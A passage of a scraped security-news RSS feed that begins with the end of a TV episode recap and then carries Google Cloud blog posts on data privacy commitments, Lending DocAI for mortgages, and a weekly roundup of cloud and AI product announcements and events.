Kim kept his past hidden because he wanted to protect his daughter and give her a normal life. However, Min-ji sees the secrecy as another deception in a relationship that was already under pressure.



This revelation adds an emotional conflict to the rescue. Kim can save Min-ji from her kidnappers, but rebuilding her trust will take much longer. She now has to accept that her quiet father once lived as a highly trained operative capable of extreme violence.



Manager Kim Finally Reaches Min-ji



The final part of the episode delivers the action-heavy rescue that the season has been building toward. Jin-cheol and Han-su take on key roles as the group attacks the location where Min-ji is being held.



Kim eventually reaches his daughter, giving viewers the reunion they have been waiting for. The moment brings relief, but it does not close the central story.



Several enemies remain active, and Min-ji is still valuable to anyone who wants control over Kim. Keeping her safe will require the three former operatives to continue working together.



The reunion also leaves Kim facing a more personal challenge. Min-ji now knows that much of the life she shared with her father was built around secrets.



Agent Kim Reactivated Episode 6 ends with the physical rescue largely complete, but the emotional rescue has only started. With four episodes remaining in the 10-part season, Kim must protect Min-ji while repairing the relationship damaged by years of lies.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sharing our data privacy commitments for the AI era]]></title>
<description><![CDATA[More and more companies want to adopt the latest cloud-based artificial intelligence (AI) and machine learning (ML) technologies, but they are subject to an increasing array of data privacy regulations. This is an important concern for customers, who are interested in using AI and ML systems to d...]]></description>
<link>https://tsecurity.de/de/3662844/it-security-nachrichten/sharing-our-data-privacy-commitments-for-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662844/it-security-nachrichten/sharing-our-data-privacy-commitments-for-the-ai-era/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>More and more companies want to adopt the latest cloud-based artificial intelligence (AI) and machine learning (ML) technologies, but they are subject to an increasing array of data privacy regulations. This is an important concern for customers, who are interested in using AI and ML systems to drive better business outcomes while complying with new data privacy laws.</p><p>Today we’re outlining how our AI/ML Privacy Commitment reflects our belief that customers should have both the <a href="https://cloud.google.com/security/">highest level of security</a> and the highest level of control over data stored in the cloud. As Google Cloud CEO Thomas Kurian recently <a href="https://cloud.google.com/blog/products/identity-security/how-google-cloud-is-addressing-data-sovereignty-in-europe-2020">shared</a>, we have heavily invested in providing customers with the capabilities they need to prevent unauthorized access to their data. </p><p>“This [AI/ML Privacy Commitment] is the first of its kind in the industry, and demonstrates the company's focus on building trust with customers,” said Nick McQuire, Senior Vice President, Enterprise Research - CCS Insight </p><p>We have always maintained that you control your data and we process it according to the agreement(s) we have with you. Furthermore, we will not and cannot look at it without a legitimate need to support your use of the service -- and even then it is only with your permission. Here are some of the additional measures we take to ensure your privacy: (reference: <a href="https://cloud.google.com/terms">GCP Terms</a>).</p><p>In addition to these commitments, for AI/ML development, we don’t use data that you provide us to train our own models without your permission. And if you want to work together to develop a solution using any of our AI/ML products, by default our teams will work only with data that you have provided and that has identifying information removed. We work with your raw data only with your consent and where the model development process requires it. </p><p>At Google Cloud, we are committed to giving you increased control and visibility over your data. Transparency creates trust, and trust is necessary for any business to succeed in this arena. That’s why we led the way in providing meaningful transparency into <a href="https://cloud.google.com/access-transparency/">provider access to customer data</a> and now we’re extending that transparency to our AI and ML work. Helping you address global privacy and data protection requirements enables you to apply machine learning to accelerate your business with confidence.  </p><p>"Google Cloud's AI/ML Privacy Commitment is the latest move by the company to ensure its customers have greater control and visibility over their data in the cloud...This commitment also underscores the importance of proactive policies and tools to enable security and privacy in machine learning, which based on our data, is more important than ever,” CCS Insight’s McQuire continued. </p><p>To learn more about our three pillars of sovereignty in Google Cloud, see this <a href="https://cloud.google.com/blog/products/identity-security/how-google-cloud-is-addressing-data-sovereignty-in-europe-2020">blog post</a>.  And to learn more about Google Cloud’s commitment to more accountable products and a culture of responsible innovation, please see our perspective on <a href="https://cloud.google.com/responsible-ai">Responsible AI</a>.</p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lending DocAI fast tracks the home loan process]]></title>
<description><![CDATA[Artificial intelligence (AI) continues to transform industries across the globe, and business decision makers of all kinds are taking notice. One example is the mortgage industry; lending institutions like banks and mortgage brokers process hundreds of pages of borrower paperwork for every loan -...]]></description>
<link>https://tsecurity.de/de/3662838/it-security-nachrichten/lending-docai-fast-tracks-the-home-loan-process/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662838/it-security-nachrichten/lending-docai-fast-tracks-the-home-loan-process/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Artificial intelligence (AI) continues to transform industries across the globe, and business decision makers of all kinds are taking notice. One example is the mortgage industry; lending institutions like banks and mortgage brokers process hundreds of pages of borrower paperwork for every loan - a heavily manual process that adds thousands of dollars to the cost of issuing a loan. In this industry, borrowers and lenders have high expectations; they want a mortgage document processing solution catered to improving operational efficiency, while ensuring speed and data accuracy. They also want a document automation process that helps enhance their current security and compliance posture.</p><p>At Google, our goal to understand and synthesize the content of the world wide web has given us unparalleled capabilities in extracting structured data from unstructured sources. Through <a href="https://cloud.google.com/solutions/document-ai">Document AI</a>, we've started bringing this technology to some of the largest enterprise content problems in the world. And with <a href="https://cloud.google.com/solutions/lending-doc-ai">Lending DocAI</a>, now in preview, we're delivering our first vertically specialized solution in this realm.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/lending_docai_1.gif" alt="Lending DocAI.gif">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>Lending DocAI is a specialized solution in our Document AI portfolio for the mortgage industry. Unlike more generalized competitive offerings, Lending DocAI provides industry-leading data accuracy for documents relevant to lending. It processes borrowers’ income and asset documents to speed-up loan applications—a notoriously slow and complex process. Lending DocAI leverages a set of specialized models, focused on document types used in mortgage lending, and automates many of the routine document reviews so that mortgage providers can focus on the more value-added decisions. Check out this product <a href="https://youtu.be/akp0zeI6_6c?t=885" target="_blank">demo</a>. </p><p>In short, Lending DocAI helps:  </p><ul><li><p><b>Increase operational efficiency in the loan process</b>: Speed up the mortgage workflow processes (e.g. loan origination and mortgage servicing) to easily process loans and automate document data capture, while ensuring that accuracy and breadth of different documents (e.g. tax statements, income and asset documents) support enterprise readiness.</p></li><li><p><b>Improve home loan experience for borrowers and lenders</b>: Transform the home loan experience by reducing the complexity of document process automation. Enable mortgage applications to be more easily processed across all stages of the mortgage lifecycle, and accelerate time to close in the loan process.</p></li><li><p><b>Support regulatory and compliance requirements</b>: Reduce risk and enhance compliance posture by leveraging a technology stack (e.g. data access controls and transparency, data residency, customer managed encryption keys) that reduces the risk of implementing an AI strategy. It also streamlines data capture in key mortgage processes such as document verification and underwriting.</p></li></ul><h3>Partnering to transform your home loan experience</h3><p>Our <a href="https://cloud.google.com/blog/products/ai-machine-learning/see-how-google-cloud-customers-transform-their-businesses-with-ai">Deployed AI approach</a> is about providing useful solutions to solve business challenges, which is why we’re working with a network of partners in different phases of the loan application process. We are excited to partner with <a href="https://www2.roostify.com/l/273232/2020-10-14/b1246x" target="_blank">Roostify</a> to transform the home loan experience during origination. Roostify makes a point-of-sale digital lending platform that uses Google Cloud Lending DocAI to speed-up mortgage document processing for borrowers and lenders. Roostify has been working with many customers to develop our joint solution, and we have incorporated valuable feedback along the way.</p><p><i>“The mortgage industry is still early in transitioning from traditional, manual processes to digitally-enabled and automated, and we believe that transformation will happen much more quickly with the power of AI. And if you are going to do AI, you’ve got to go Google.” - <b>Rajesh Bhat, Founder and CEO, Roostify</b></i></p><p>Our goal is to give you the right tools to help borrowers and lenders have a better experience and to close mortgage loans in shorter time frames, benefiting all parties involved. With Lending DocAI, you will reduce mortgage processing time and costs, streamline data capture, and support regulatory and compliance requirements.</p><h3>Let’s connect</h3><p>Be sure to tune in to the <a href="https://www.mba.org/conferences-and-education/event-mini-sites/annual-convention-and-expo" target="_blank">Mortgage Bankers Association annual convention</a> to learn more from our <a href="https://www2.roostify.com/l/273232/2020-10-14/b12482" target="_blank">Fireside Chat</a> and <a href="https://www2.roostify.com/l/273232/2020-10-14/b12484" target="_blank">session</a> with Roostify!</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/ai-machine-learning/ai-and-machine-learning-news-from-google-cloud/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Empowering teams to unlock the value of AI</h4>
            <p class="uni-related-article-tout__body">The latest and greatest AI and machine learning news from Google Cloud</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enhancing our privacy commitments to customers]]></title>
<description><![CDATA[Around the world, companies in every industry rely on our cloud services to run their businesses, and we take that responsibility seriously. That’s why we’re focused on providing industry-leading security and product capabilities, certifications, and commitments, along with transparency and visib...]]></description>
<link>https://tsecurity.de/de/3662834/it-security-nachrichten/enhancing-our-privacy-commitments-to-customers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662834/it-security-nachrichten/enhancing-our-privacy-commitments-to-customers/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p><span>Around the world, companies in every industry rely on our cloud services to run their businesses, and we take that responsibility seriously. That’s why we’re focused on providing industry-leading security and product capabilities, certifications, and commitments, along with transparency and visibility into when and how customer data is accessed. Today, we’re expanding on these commitments and sharing an update on our latest work in this area. </span></p>
<h3><strong>Commitment to privacy </strong></h3>
<p><span>Our </span><a href="https://cloud.google.com/privacy"><span>Google Cloud Enterprise Privacy Commitments</span></a><span> outline how we protect the privacy of customers whenever they use </span><a href="https://workspace.google.com/" rel="noopener" target="_blank"><span>Google Workspace</span></a><span>, </span><a href="https://edu.google.com/workspace-for-education/editions/education-fundamentals/?hl=en" rel="noopener" target="_blank"><span>Google Workspace for Education</span></a><span> and </span><a href="https://cloud.google.com/gcp/"><span>Google Cloud </span></a><span>. There are two distinct types of data that we consider across both of these platforms</span><strong>—</strong><span>customer data and service data:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Customer data: </strong><span>We start from the fundamental premise that, as a Google Cloud customer, you own your customer data. We implement stringent security measures to safeguard that data, and provide you with tools to control it on your terms. Customer data is the data you, including your organization and your users, provide to Google when you access Google Workspace, Google Workspace for Education and Google Cloud, and the data you create using those services.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Service data: </strong><span>We also secure any service data</span><strong>—</strong><span>the information Google Cloud collects or generates while providing and administering Google Workspace</span><span>, Google Workspace for Education, and Google Cloud </span><strong>— </strong><span>which is </span><span>critical to help ensure the security and availability of our services. </span><span>Service data does not include customer data </span><strong>— </strong><span>it includes information about security settings, operational details, and billing information. </span><span>We process service data for the purposes that are detailed in our </span><a href="http://cloud.google.com/terms/cloud-privacy-notice"><span>Google Cloud Privacy Notice</span></a><span> (newly launched to provide more specific information about how we process service data, and effective November 27, 2020), such as making recommendations to optimize your use of Google Workspace and Google Cloud, and improving performance and functionality.</span></p>
</li>
</ul>
<p><span>When you use Google Cloud services, you can be confident that:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>You control your data. </strong><span>Customer data is your data, not Google Cloud’s. We only process your data according to your agreement(s). </span></p>
</li>
</ul>
<ul>
<li aria-level="1">
<p role="presentation"><strong>We never use your data for ads targeting.</strong><span> We do not process your customer data or service data to create ads profiles or improve Google Ads products.</span></p>
</li>
</ul>
<ul>
<li aria-level="1">
<p role="presentation"><strong>We are transparent about data collection and use. </strong><span>We’re committed to transparency, compliance with regulations like the GDPR, and privacy best practices.</span></p>
</li>
</ul>
<ul>
<li aria-level="1">
<p role="presentation"><strong>We never sell customer data or service data. </strong><span>We never sell customer data or service data to third parties.</span></p>
</li>
</ul>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Security and privacy are primary design criteria for all of our products. </strong><span>Prioritizing the privacy of our customers means protecting the data you trust us with. We build the strongest security technologies into our products.</span></p>
</li>
</ul>
<p><span>These commitments are backed by the strong contractual privacy commitments we make available to our customers for </span><a href="https://workspace.google.com/" rel="noopener" target="_blank"><span>Google Workspace</span></a><span>, </span><a href="https://edu.google.com/workspace-for-education/editions/education-fundamentals/?hl=en" rel="noopener" target="_blank"><span>Google Workspace for Education</span></a><span> and </span><a href="https://cloud.google.com/terms/data-processing-terms"><span>Google Cloud</span></a><span>. </span></p>
<h3><strong>Enhanced customer controls and new third party certifications</strong></h3>
<p><span>We recently</span><span> released new capabilities that further improve visibility and control over how data in our cloud is accessed and processed. In 2018, we were the first major cloud provider to bring </span><a href="https://cloud.google.com/blog/products/gcp/building-trust-through-access-transparency"><span>Access Transparency</span></a><span> to our customers, providing you with near real-time logs of the rare occasions Google Cloud administrators access your content. To give you even more visibility and control, we’ve made </span><a href="https://cloud.google.com/access-transparency"><span>Access Approval</span></a><span> for Google Cloud generally available to let you approve or dismiss requests for access by Google employees working to support your service. </span></p>
<p><span>Our </span><a href="https://cloud.google.com/recommender/docs/transparency-and-control-center/audit-logging"><span>Transparency &amp; Control Center</span></a><span> is also now generally available as part of the Google Cloud Console. It gives you the ability to </span><a href="https://cloud.google.com/recommender/docs/opting-out"><span>enable and disable data processing</span></a><span> that supports features such as recommendations and insights at the organization and project level. It also allows you to </span><a href="https://cloud.google.com/iam/docs/recommender-exporting-data"><span>export personal data</span></a><span> that may be used to generate recommendations and insights. </span></p>
<p><span>For Google Workspace, in addition to providing granular </span><a href="https://support.google.com/a/answer/9725452?hl=en&amp;ref_topic=9027054" rel="noopener" target="_blank"><span>audit logs</span></a><span>, we offer organization admins and users the ability to download a copy of their data via the </span><a href="https://support.google.com/a/answer/100458?hl=en" rel="noopener" target="_blank"><span>data export tool</span></a><span> and </span><a href="https://support.google.com/accounts/answer/3024190" rel="noopener" target="_blank"><span>Google Takeout</span></a><span>. These are just some of the ways we help support data portability requirements under privacy regulations such as the EU’s GDPR and the California Consumer Privacy Act (CCPA).</span></p>
<p><span>We continue to reinforce our commitment to privacy by meeting the requirements of internationally-recognized privacy laws, regulations, and standards. This summer we announced</span><span> that we are the </span><a href="https://cloud.google.com/blog/products/identity-security/google-cloud-certified-as-a-data-processor"><span>first major cloud provider</span></a><span> and </span><a href="https://cloud.google.com/blog/products/workspace/announcing-new-security-and-privacy-updates-in-google-workspace"><span>productivity suite</span></a><span> to receive accredited</span><span> </span><a href="http://cloud.google.com/security/compliance/iso-27701"><span>ISO/IEC 27701 certification</span></a><span> as a data processor. Our </span><a href="https://services.google.com/fh/files/misc/gcp_iso27701_june_2020.pdf" rel="noopener" target="_blank"><span>accredited ISO/IEC 27701 certifications</span></a><span> for Google Workspace and Google Cloud provide customers with benefits including simplified audit processes, universal privacy controls and greater clarity around privacy-related roles and responsibilities. </span><span>Certifications provide independent validation of our ongoing dedication to world-class security and privacy, and we look forward to obtaining </span><a href="https://cloud.google.com/security/compliance"><span>additional certifications</span></a><span> in the future. </span></p>
<h3><strong>Continued innovation to support customer needs </strong></h3>
<p><span>As the global privacy landscape and our customers’ needs change, Google Cloud will continue to work diligently to maintain our commitments to privacy, control and transparency. To learn more about our efforts, visit </span><a href="https://cloud.google.com/security/"><span>our Trust and Security center</span></a><span>.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s new with Google Cloud]]></title>
<description><![CDATA[Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: Google Cloud bl...]]></description>
<link>https://tsecurity.de/de/3662833/it-security-nachrichten/whats-new-with-google-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662833/it-security-nachrichten/whats-new-with-google-cloud/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p data-block-key="kgod7">Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. </p><hr><p data-block-key="ru1z9"><b>Tip</b>: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: <a href="https://cloud.google.com/blog/topics/inside-google-cloud/complete-list-google-cloud-blog-links-2021">Google Cloud blog 101: Full list of topics, links, and resources</a>.</p><hr><p data-block-key="b0lnw"></p></div>
<div class="block-aside"><dl>
    <dt>aside_block</dt>
    <dd>&lt;ListValue: []&gt;</dd>
</dl></div>
<div class="block-paragraph_advanced"><h3>Jul 6 - Jul 10</h3>
<ul>
<li><strong>Webinar: Introducing Google Cloud NGFW Enterprise advanced malware protection - powered by Palo Alto Networks<br></strong>Discover the new Cloud NGFW advanced malware sandbox, arriving in preview later this year. Powered by Palo Alto Networks Advanced Wildfire, it leverages data from 70,000+ customers to help defeat advanced malware. Join us on July 16 at 11 AM EDT to learn how to build a resilient, zero-trust cloud infrastructure that protects your apps and data, wherever they reside.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="18" href="https://www.brighttalk.com/webcast/18282/668861?utm_source=GCBlog" rel="noreferrer noopener" target="_blank">Register for the webinar now</a></li>
<li><strong>Safely run AI-generated code in Cloud Run sandboxes<br></strong>Cloud Run sandboxes, now in public preview, are lightweight, isolated execution boundaries that you can spawn near-instantly <strong>within your existing Cloud Run service instances</strong>.<br><br>Whether you need to let an LLM run a dynamically generated Python script to calculate business margins or spin up a headless browser to perform web research, Cloud Run sandboxes give you a secure, isolated sandbox to run these tasks without leaving your serverless environment.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="22" href="https://cloud.google.com/blog/topics/developers-practitioners/google-cloud-run-sandboxes-are-in-public-preview" rel="noreferrer noopener" target="_blank">Read the blog</a><span> to learn more and get started today.</span></li>
<li><strong>Australia API Horizon: Scaling Enterprise Governed AI Agents<br></strong>The transition from AI chatbots to autonomous agents is the most critical integration point for your business. Join Google Cloud at our upcoming events to explore exclusive deep-dive sessions on architecting for the agentic era.<br><br>Discover how to use Apigee as an intelligent AI Gateway to govern, secure, and scale high-performance architectures. You will learn to seamlessly build AI tools from your existing APIs and maintain control over your entire ecosystem.<br><br>Join us in your preferred city:
<ul>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="36" href="https://goo.gle/4voh18S" rel="noreferrer noopener" target="_blank"><strong>Sydney:</strong> July 28, 2026, at Google Sydney, One Darling Island.</a></li>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="37" href="https://goo.gle/4h2x0FS" rel="noreferrer noopener" target="_blank"><strong>Canberra:</strong> July 29, 2026, at Hotel Realm.</a></li>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="38" href="https://goo.gle/4yisb1F" rel="noreferrer noopener" target="_blank"><strong>Melbourne:</strong> August 4, 2026, at Google Melbourne.</a></li>
</ul>
</li>
<li><strong>Build highly available, multi-region services on Cloud Run<br></strong>Maintaining uptime for business-critical applications just got a lot easier on Cloud Run. Service health, now Generally Available, automates cross-region failover by leveraging readiness probes for instance-level health checks with a simple, two-click setup. You can configure service health with global external Application Load Balancers for public-facing applications or cross-region internal Application Load Balancers for private networking traffic.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="42" href="https://cloud.google.com/run/docs/configuring/configure-service-health" rel="noreferrer noopener" target="_blank">Learn how to configure service health for Cloud Run.</a></li>
<li><strong>Report: 83% of organizations need infrastructure upgrades for agentic AI<br></strong>The shift from conversational bots to autonomous agents is breaking legacy systems. Our new <em>State of AI Infrastructure</em> report details how engineering leaders are adapting to these massive new workloads. To eliminate inference bottlenecks, control hidden scaling costs, and manage agent sprawl, the industry is rapidly moving toward fluid compute, centralized governance, and unified, co-designed architectures.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="46" href="https://cloud.google.com/blog/products/compute/state-of-ai-infrastructure-report-overview?e=48754805" rel="noreferrer noopener" target="_blank">Explore our key infrastructure insights</a></li>
<li><strong>Stop tinkering, start scaling: the industrialized AI Playbook<br></strong>Did you know that only 5% of custom AI investments actually return measurable business value? The problem isn’t the technology—it’s how organizations are wired to run it.<br><br>In this compelling read, Google Cloud Consulting breaks down the operational blueprint that bridges the stark gap between "cool tech experiments" and real, P&amp;L-impacting enterprise ROI.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="50" href="https://www.google.com/url?q=https%3A%2F%2Fmedium.com%2F%40kjouannigot_73547%2Fscaling-trusted-ai-google-cloud-insights-to-capture-enterprise-roi-aa6c9b308adb" rel="noreferrer noopener" target="_blank">Read the full article on Medium</a></li>
<li><strong>AI Agent Clinic: Slashing App Latency by 80%<br></strong>Prototyping an AI agent is easy, but scaling for live traffic presents unique challenges. In the latest AI Agent Clinic, our technical experts partner with a developer to optimize PlaybackIQ, a live football analysis agent. This session demonstrates how to use OpenTelemetry to trace bottlenecks in the Gemini Enterprise Agent Platform and deploy to Cloud Run for high-concurrency scaling, achieving an 80% reduction in response time. Learn production-grade debugging strategies to optimize your own LLM applications.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="54" href="https://www.google.com/search?q=https://youtu.be/G7olcqETSn8" rel="noreferrer noopener" target="_blank">Watch the 60-minute teardown</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 29 - Jul 3</h3>
<ul>
<li><strong>Claude Sonnet 5, Anthropic’s latest model, is now available on Agent Platform</strong>. <br>This addition serves as a drop-in replacement for Sonnet 4.6, giving organizations expanded choice for task completion across enterprise workflows. It features enhanced reasoning, cleaner code generation, and computer use capabilities for desktop and browser workflows.<br><br>By continuing to rapidly bring frontier models to our platform, Google Cloud offers an uncompromised choice of the industry's best technology to build, test, and scale enterprise-grade AI.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://console.cloud.google.com/agent-platform/publishers/anthropic/model-garden/claude-sonnet-5?hl=en" rel="noreferrer noopener" target="_blank"><em>Get started today.</em></a></li>
<li>
<p><strong>Automate your AI governance with Apigee and YAML<br></strong><span>Manual API gateway configurations can quickly slow down your AI engineering velocity. Join the Apigee community on Thursday, July 16, to discover an automated, declarative blueprint for model garden management. Learn how a simple, repeatable YAML pattern lets your AI practitioners instantly spin up secure, policy-backed enterprise configurations  without friction. Bring your questions and connect during our live Q&amp;A session. </span></p>
<p><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 16 Community TechTalk</strong></a></p>
</li>
<li>
<p><strong>Build next-generation AI portals for autonomous agents<br></strong><span>Standard developer portals were designed for human developers to subscribe to static APIs. Today, autonomous agents, LLM toolkits, and dynamic runtimes demand a central nervous system for governance. Join our technical deep dive on Thursday, July 23, to explore Apigee's new AI Portals solution. You will see exactly how to deploy full-service, MCP powered hubs to safely manage enterprise self-service for models, tools, and agents. </span></p>
<p><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 23 Community TechTalk</strong></a></p>
</li>
<li><strong>Protect your infrastructure from advanced cyberattacks at the API layer (Presented in Portuguese)<br></strong>In an era of increasingly sophisticated threats, relying solely on traditional firewalls leaves critical data gaps. Join our technical community TechTalk on Thursday, July 30—conducted in Portuguese—to learn how to proactively mitigate risks directly at the gateway layer. This session demonstrates how to configure and govern essential Apigee security policies to build a robust line of defense, ensuring maximum availability and complete integrity for your enterprise microservices. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 30 Portuguese Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 22 - Jun 26</h3>
<ul>
<li><strong>Accelerate TPU model loading while saving RAM on GKE.<br></strong>Large model cold starts often stall scaling and leave high-value TPUs idle. The open-source <strong>Run:ai Model Streamer</strong> now natively supports TPUs with Google Cloud Storage in<strong> </strong><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://github.com/vllm-project/tpu-inference" rel="noreferrer noopener" target="_blank"><strong>TPU vLLM 0.18.0</strong>.</a> This integration accelerates inference pipelines on GKE by streaming tensors directly into CPU memory, bypassing local disk bottlenecks and the "double-buffering" trap. In benchmarks, loading a 480B parameter model was <strong>over 2x faster</strong> while cutting peak host memory usage by half. <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://discuss.google.dev/t/accelerate-tpu-model-loading-while-saving-ram-on-gke/374835" rel="noreferrer noopener" target="_blank"><strong>Read the full guide and get started today</strong></a>.</li>
<li><strong>Stop Training Blind: Scaling AI with the New OpenTelemetry-Based TPU AI Telemetry Collector Agent<br></strong>Google Cloud’s new AI Telemetry Collector agent standardizes TPU monitoring using OpenTelemetry. It optimizes enterprise ML workloads by identifying silent failures and providing zero-cost operational metrics without draining host CPU cycles. The agent seamlessly routes telemetry to Google Cloud Monitoring or Prometheus and custom Grafana setups. Pre-installed on Google-optimized Ubuntu images or available via Docker, it tracks memory, network latency, and core utilization to maximize multi-node training efficiency.<br><br>You can read more of this capability by clicking this <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://discuss.google.dev/t/stop-training-blind-scaling-ai-with-the-new-opentelemetry-based-tpu-ai-telemetry-collector-agent/375210" rel="noreferrer noopener" target="_blank">link</a>.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 15 - Jun 19</h3>
<ul>
<li><strong>Join us for a deep dive into agentic AI control with AppyThings<br></strong>Your integrations aren’t failing—they are evolving. When users interact with AI agents, they no longer arrive directly at your site, resulting in experiences stripped of your context, expertise, and intended experience. Join us on Thursday, June 25, for a community tech talk in partnership with AppyThings to learn how to solve this new gateway challenge. We will explore how MTN laid an integration foundation with the Model Context Protocol (MCP) to deliver accurate, consistent experiences. Our technical experts will demonstrate how to leverage Apigee as a centralized tools management solution to govern agent access. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/3Sfle0y" rel="noreferrer noopener" target="_blank"><strong>Register for the session</strong></a></li>
<li><strong>Optimize Spot VM Deployments with Capacity Advisor for Spot, Now in Public Preview<br></strong>Google Compute Engine has launched <strong>Capacity Advisor for Spot</strong> to Public Preview, now open to all customers. This tool turns Spot capacity discovery into a data-driven process by providing real-time deployment recommendations to maximize obtainability and minimize preemption risks. Query the <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/compute/docs/instances/view-vm-availability" rel="noreferrer noopener" target="_blank"><strong>Capacity Advisor API</strong></a> for obtainability and minimum estimated uptimes, or use the new <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://console.cloud.google.com/compute/capacityAdvisor" rel="noreferrer noopener" target="_blank"><strong>Console UI</strong></a> featuring a global availability map, spot price lookups, and historical preemption rate trends to visually find the most cost-efficient compute capacity.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/compute/docs/instances/view-vm-availability" rel="noreferrer noopener" target="_blank">Get started today</a> to start optimizing your Spot VM deployments!</li>
<li><strong>Build a multi-tenant agentic AI system<br></strong>When scaling generative AI across different business units, your teams need specialized AI agents with unique operational rules and tools. Our new reference architecture helps you build a centralized multi-tenant platform to prevent fragmented silos, eliminate data exposure risks, and maintain unified compliance. Read the guide to <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/architecture/multi-tenant-agentic-ai-system" rel="noreferrer noopener" target="_blank">design and deploy a multi-tenant agentic AI system</a> in Google Cloud.</li>
